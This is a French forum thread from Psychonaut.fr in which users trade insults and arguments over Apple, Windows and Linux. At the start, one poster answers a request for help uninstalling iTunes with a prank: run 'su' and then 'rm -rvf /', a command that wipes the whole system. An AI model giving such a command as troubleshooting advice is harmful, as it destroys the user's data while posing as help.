Quoi de neuf ?

Bienvenue sur Psychonaut.fr !

En vous enregistrant, vous pourrez discuter de psychotropes, écrire vos meilleurs trip-reports et mieux connaitre la communauté

Je m'inscris!

Ce qui vous emm**de le plus

D

D.F.

Invité
@Schtroumpfette : Ouvres une console ensuite tu saisis les commandes suivantes :
su (A la validation un mot de passe est demandé, tu mets ton mot de passe admin et tu fais enter.)
rm -rvf / (Tu verras un tas de lignes défiler, attends que ce soit fini.)
Après ça je t'invite à jeter ta brique inutilisable hors de prix à la poubelle et d'investir dans une vraie machine (tout sauf un mac quoi).

:roll:
 

grivois

Psychonaut
Inscrit
22 Fev 2011
Messages
5 928
Tiens, sans vouloir me faire lapider je pensai que les macs c'était bien.
Don, si tu veux bien, dis moi brièvement ce qui te dérange avec ce matos (à part le prix: là je suis d'accord) ?
 
D

D.F.

Invité
grivois a dit:
Don, si tu veux bien, dis moi brièvement ce qui te dérange avec ce matos (à part le prix: là je suis d'accord) ?
En vrac et non exhaustif :
- Les prix surfaits juste à cause du logo pommé (Apple se permet même de vendre M$ Office version Mac plus cher que le fait M$...) alors que rien ne le justifie au niveau des coûts de fabrication et de R&D.
- Le verrouillage sur-abusé. Apple décide ce que tu as le droit ou non de faire avec ta machine acheté à un prix surfait et si t'es pas content, bah tant pis. Au pire tu peux jailbreak, mais dans ce cas plus de garantie (quoique, un jailbreak ça se cache lol).
- Le fait que si tu n'achètes pas Apple, "tu n'es qu'une pauvre merde sans argent, sans goût et sans avenir."
- Les OS Apple, qui ne sont rien d'autre qu'une version repompée de FreeBSD avec un kernel et un GUI custom, vendus à prix d'or et ventés comme des révolutions alors qu'ils ne sont que du repompage.
- Les fanboys Apple, des iMoutons qui pensent vraiment qu'Apple révolutionne l'électronique alors qu'il ne font pour ainsi dire que copier ce qui se fait déjà et le vendre 3x plus cher. Ces iMoutons qui pensent être des gens exceptionnels, parce qu'ils rachètent la nouvelle version de leur iMachin à prix surfait tous les 6 mois, en étant même prêts à camper toute la nuit devant leur foutu store.
- La culture du procès par Apple : Vu qu'ils n'arrivent pas à suivre la concurrence qui fait de bien meilleurs produits, ils tentent à tout prix de les faire interdire ou de toucher des royalties via les tribunaux. Pour rappel, Apple reprochait avec véhémence cette politique que M$ appliquait dans les années 90.

La liste est assez longue comme ça ? :roll:
 

GuyGeorge

Holofractale de l'hypervérité
Inscrit
28 Avr 2008
Messages
7 454
Don_Fouinardo a dit:
grivois a dit:
Don, si tu veux bien, dis moi brièvement ce qui te dérange avec ce matos (à part le prix: là je suis d'accord) ?
En vrac et non exhaustif :
- Les prix surfaits juste à cause du logo pommé (Apple se permet même de vendre M$ Office version Mac plus cher que le fait M$...) alors que rien ne le justifie au niveau des coûts de fabrication et de R&D.
- Le verrouillage sur-abusé. Apple décide ce que tu as le droit ou non de faire avec ta machine acheté à un prix surfait et si t'es pas content, bah tant pis. Au pire tu peux jailbreak, mais dans ce cas plus de garantie (quoique, un jailbreak ça se cache lol).
- Le fait que si tu n'achètes pas Apple, "tu n'es qu'une pauvre merde sans argent, sans goût et sans avenir."
- Les OS Apple, qui ne sont rien d'autre qu'une version repompée de FreeBSD avec un kernel et un GUI custom, vendus à prix d'or et ventés comme des révolutions alors qu'ils ne sont que du repompage.
- Les fanboys Apple, des iMoutons qui pensent vraiment qu'Apple révolutionne l'électronique alors qu'il ne font pour ainsi dire que copier ce qui se fait déjà et le vendre 3x plus cher. Ces iMoutons qui pensent être des gens exceptionnels, parce qu'ils rachètent la nouvelle version de leur iMachin à prix surfait tous les 6 mois, en étant même prêts à camper toute la nuit devant leur foutu store.
- La culture du procès par Apple : Vu qu'ils n'arrivent pas à suivre la concurrence qui font de bien meilleurs produits, ils tentent à tout prix de les faire interdire ou de toucher des royalties via les tribunaux. Pour rappel, Apple reprochait avec véhémence cette politique que M$ appliquait dans les années 90.

La liste est assez longue comme ça ? :roll:

:heart: :heart: :heart: Coupain... Je suis loin d'être un geek, je m'y connais que vite fait mais alors putain déjà que ça me casse assez les couilles a avoir itunes sur mon PC (entrer sa carte de crédit, et pi quoi encore tu veux des pics de la chatte de ma petite soeur?!?"), alors nan nan leur pomme en or massif ils peuvent se la carer profondément là ou je pense. Désolé de l'agressivité inutile de ce post, mais Don Fouinardo tu as mis les mots parfaits sur ce que je ressentais profondément dans mes tripes sans trouver les mots pour l'expliquer. :D
 
T

Towelly

Invité
Ne crachons pas sur les iMoutons, ils n'ont seulement pas d'identité les pauvres. Pi le dernier iProut est stylé, euh je le veux moi y'a Jean Patrick qui a le même à l'école d'abord.




Heureusement le messie Steve Blowjobs arriva au secours de ces âmes tristes et les arracha à l'enfer.
 

grivois

Psychonaut
Inscrit
22 Fev 2011
Messages
5 928
D'accord mort de rire, je suis donc un 1/2 imouton (le iPhone 4s dont je suis quand même super satisfait)..... Noooooon me lapidez pas, sinon ma config Pc c'est Windaube/Linux en dual boot (j'me rattrape hein :) )

Je pense qu'on peux clore le sujet Don à fait un bon condensé et on est pas sur un forum informatique :shock:
 
D

D.F.

Invité
Bah encore quelqu'un qui aime Apple, c'est son choix, mais quand t'entends les fanboy de base te dire que tout ce qui n'est pas Apple et/ou approuvé par Steve Dieu-le-Père c'est soit de la merde, soit du plagiat, ça fait un peu mal au boule.

"Apple a inventé le lecteur MP3"
=> iPod1 - 2001
=> Eiger Labs MPMan F10 - 1998
"Apple a inventé le smartphone"
=> iPhone - 2007
=> Qtek 7070 - 2004 (Surement pas le premier, mais je l'avais <3)
"Apple a inventé la tablette tactile.
=> iPad - 2010
=> PalmPilot 1000 - 1996 (surement pas le premier, mais marre de chercher)

Enfin bref, je vais arrêter de basher sur Apple, je suis en train de faire exactement ce que je ne tolère pas chez les fanboys de base (bon au moins, pour ma part c'est des faits).

Grivois => J'crois qu'on est dans la seule section dont le but n'est pas de parler que de la drôke. ^^
 

grivois

Psychonaut
Inscrit
22 Fev 2011
Messages
5 928
Don_Fouinardo a dit:
Bah encore quelqu'un qui aime Apple, c'est son choix, mais quand t'entends les fanboy de base te dire que tout ce qui n'est pas Apple et/ou approuvé par Steve Dieu-le-Père c'est soit de la merde, soit du plagiat, ça fait un peu mal au boule.

"Apple a inventé le lecteur MP3"
=> iPod1 - 2001
=> Eiger Labs MPMan F10 - 1998
"Apple a inventé le smartphone"
=> iPhone - 2007
=> Qtek 7070 - 2004 (Surement pas le premier, mais je l'avais <3)
"Apple a inventé la tablette tactile.
=> iPad - 2010
=> PalmPilot 1000 - 1996 (surement pas le premier, mais marre de chercher)

Enfin bref, je vais arrêter de basher sur Apple, je suis en train de faire exactement ce que je ne tolère pas chez les fanboys de base (bon au moins, pour ma part c'est des faits).

Grivois => J'crois qu'on est dans la seule section dont le but n'est pas de parler que de la drôke. ^^


Ah ça me rappelle que je l'ai l iPod 1g de 160 go, il traîne qq part, une pièce de collection bientôt ;)



Uploaded with ImageShack.us
 

B_G

Glandeuse pinéale
Inscrit
12 Déc 2011
Messages
200
Dans les truc qui m'emm**, j'ajoute la série "enlever le papier peint, trouvez que c'est vraiment long d'enlever du papier peint, vouloir remettre un nouveau papier peint, trouvez que c'est vraiment moche, enlevez le papier peint, repeindre en blanc pour être tranquille" :lol:
 

grivois

Psychonaut
Inscrit
22 Fev 2011
Messages
5 928
Ti ax enfin georges, c quoi ce bordel ?????????????????????????,,
 

schtroumpfette

Psycho disparu·e
Inscrit
11 Juin 2007
Messages
6 100
- J'ai acheté un Mac dont je suis globalement très contente (pour le traitement d'images fixes et animées, c'est tout de même mieux) lorsque mon PC a rendu l'âme au bout d'une longue agonie.
- Je n'ai ni iPhone, ni iPod, ni iPad, et n'en aurai probablement jamais.
- Je n'ai d'ailleurs pas de lecteur MP3 de quelque marque que ce soit.
- Mon GSM est un vieux Nokia à écran bicolore (noir sur fond jaune/vert).

- Tout ce que je souhaite, c'est désinstaller iTunes dont je ne me sers pas et qui prend de la place pour rien, pas relancer le millième débat stérile Windows vs Mac vs Linux.
 
D

D.F.

Invité
schtroumpfette a dit:
- Tout ce que je souhaite, c'est désinstaller iTunes dont je ne me sers pas et qui prend de la place pour rien
Roh t'as pas essayé mes 2 lignes ? Y'a pas mieux pour faire de la place niark niark.

Mais bon c'est vraiment si lourd que ça itunes ?
 

Sludge

Holofractale de l'hypervérité
Inscrit
17 Sept 2011
Messages
16 405
La pauvre demande un peu d'aide et a le droit à une leçon sur Steve Jobs et ses fanboys. :lol:
iTunes ça a l'air bien pourri en effet. Viva Foobar2000.
 

Glitch

Elfe Mécanique
Inscrit
25 Avr 2011
Messages
420
Don_Fouinardo a dit:
schtroumpfette a dit:
- Tout ce que je souhaite, c'est désinstaller iTunes dont je ne me sers pas et qui prend de la place pour rien
Roh t'as pas essayé mes 2 lignes ? Y'a pas mieux pour faire de la place niark niark.

Mais bon c'est vraiment si lourd que ça itunes ?

Ce que je trouve bizarre c'est cette impression que l'anti-mac devient une mode alors que bon, tous les utilisateurs de mac se sentent pas non plus tels Dieu le Père parce qu'ils ont une pomme rétro-éclairée sur leur ordi...

J'sais pas, y'a qd même pas mal de logiciels qui sont que sur Mac ; et si ils ont leurs équivalents sur PC ou Linux, ils restent néanmoins utilisés en grande partie dans certains milieux professionnels...

Puis laisser les gens être des moutons, tranquillement, ça serait cool aussi. Si évidemment, acheter un PC c'est "trop mieux" parce que "pour trop moins cher" t'as "trop des meilleurs composants", acheter un Mac, "pour "l'ergonomie du truc", (Tech*1 : se placer de l'autre côté que celui qu'on défend - donc oui je galère plus sur Mac que sur Pc), et espérer en mettant un peu de sous avoir un produit de qualité avec un SAV qui certes parfois douteusement rend quand même les ordis en état de marche," c'est pas le péché originel. C'est le "lobby" (quand on sait pas parler on met tt entre guillemets) exercé par les différentes sociétés (apomme incluse évidemment) qui est criticable, catégoriser les produits et les utilisateurs est un peu plus ardu.

Je suis sur mac, là. J'ai deux PC aussi, portable et fixe, dont un sur linux, j'y connais rien en informatique et je suis foutre-ment mieux sur mac pour les trucs con-cons, genre ranger ma musique, télécharger des films, prendre des notes. J'ai final cut pro donc je suis content, le machin rame jamais ; bug quasiment jamais, c'est joli, kikoo, rétro-éclairé, ça fait plaisir.

De l'autre côté pour le même prix je me trimballe un monstre en PC, le truc du genre bien encombrant, bien puissant. Au final windaube, y'a pas à dire, faut bien le gérer le machin, anti virus, tout le tra la la, défragmentations, formatages, partitions... 'fin se faire chier.

Et Linux, bah mon QI a tellement chuté depuis la 4ème que je me risquerai pas à l'installer sur mon PC ; puis pour quoi faire ? Je perdrai le seul avantage de windows, les jeux ? :/ Doit y avoir un truc pour virtualiser Windows sous linux, mais je suppose que ça fait ramer le tout.

Du coup voilà, je suis sur mac, je sais bientôt plus me servir d'un PC, je suis devenu un mouton, tranquillement. Mais en fait sans vouloir faire caca, l'utilisateur lambda, pas un brin calé en informatique, c'est quoi son intérêt d'aller sur linux à part alléger un peu le système et se poser des questions qu'un utilisateur windows ou mac se serait jamais posé ?
 

Lotre

Holofractale de l'hypervérité
Inscrit
30 Nov 2011
Messages
3 892
Ben c'est justement pour éviter les histoires d'antivirus / defrag / formatages récurents dont tu as parlé, à mon humble avis (par rapport à windows). Après Linux VS Mac c'est avant tout un choix matériel, et pi logiciel libre / propriétaire, gratuit / payant.
 
D

DasFrog

Invité
J'aimerais tellement rencontrer tous ces iMoutons dont vous parlez tant ! Et pas les débiles de la télé hein, des vrais.
Non parce que j'ai rarement vu autant de généralisation sur ce débat, et (je me répète pour la xème fois, voyez-m'en navré, oupa) je trouve ça assez gros venant de gros-junkies-qui-passent-leurs-journées-à-s'injecter-des merdes-et-qui-vont-rester-bloqués-et-se-râper-les-bras-parce-qu'ils-se-prennent-pour-des-carottes...
C'est peut-être que ceux-là que vous voyez parce qu'il gueulent fort mais perso je ne remarque les BM que quand elles sont conduites par des bulots qui passent à fond comme des andouilles avec de la musique à te faire péter les tympans.

...
Et laisser les gens choisir suivant ce qui leur convient et ce qui leur fait plaisir, non ?
 
D

D.F.

Invité
C'est dur le déni. :'|

M'enfin j'ai rien contre les gens qui aiment payer des produits trop cher, être contrôlés par la firme qui leur vend un produit trop cher et qui font confiance à une société qui cherche à se débarrasser d'une concurrence plus efficace qu'elle à coup de procès, faute de pouvoir concevoir des produits de meilleur qualité.

Tiens pour rigoler :
Google a dit:
"Apple Sues" => Environ 37'400'000 résultats
"Samsung Sues" => Environ 6'780'000 résultats
"HTC Sues" => Environ 2'650'000 résultats
"Microsoft Sues" => Environ 2'370'000 résultats
skitched-20110919-172118.jpg


Mais bon, si pour vous camper devant un magasin pour acheter le nouveau iTruc overpriced tous les 6 mois tout en crachant sur la concurrence et en croyant réellement que les produits Apple sont une révolution ce n'est pas faire preuve d'instinct grégaire, je ne sais pas ce qu'il vous faut comme exemple.

Sinon j'ai pas bashé Schtroumpfette (juste une blagounette), je répondais à Grivois avec des arguments vérifiables (bon, les fanboys ne représentent heureusement pas toute la clientèle d'Apple).

PS : L'argument stabilité formatage etc ça tient pas, il suffit de ne pas installer de la merde à tout va ; c'est clair qu'en mettant des petites roues sur son vélo, on a beaucoup moins de chances de tomber. :roll:

Ah elle est bien morte l'Apple qui dépeignait le monde de l'informatique comme celui de 1984 et crachait sur les entreprises à procès...
 
T

Towelly

Invité
Don, tu es un gros-junkie-qui-passe-tes-journées-à-s'injecter-des merdes-et-qui-va-rester-bloqué-et-se-râper-les-bras-parce-que-tu-te-prends-pour-une-carotte je t'ai reconnu. Et moi aussi d'ailleurs.

Glitch a dit:
Ce que je trouve bizarre c'est cette impression que l'anti-mac devient une mode alors que bon, tous les utilisateurs de mac se sentent pas non plus tels Dieu le Père parce qu'ils ont une pomme rétro-éclairée sur leur ordi...

C'est pas ce qu'on a dit, pour le coup -vous- généralisez. On dit juste que les iDonneursdetunes se font un peu enculer à sec par Mr Blowjobs, enfin surtout leur porte-feuille.


Glitch a dit:
Au final windaube, y'a pas à dire, faut bien le gérer le machin, anti virus, tout le tra la la, défragmentations, formatages, partitions... 'fin se faire chier.

Je vois pas de quoi tu parles.
 
Haut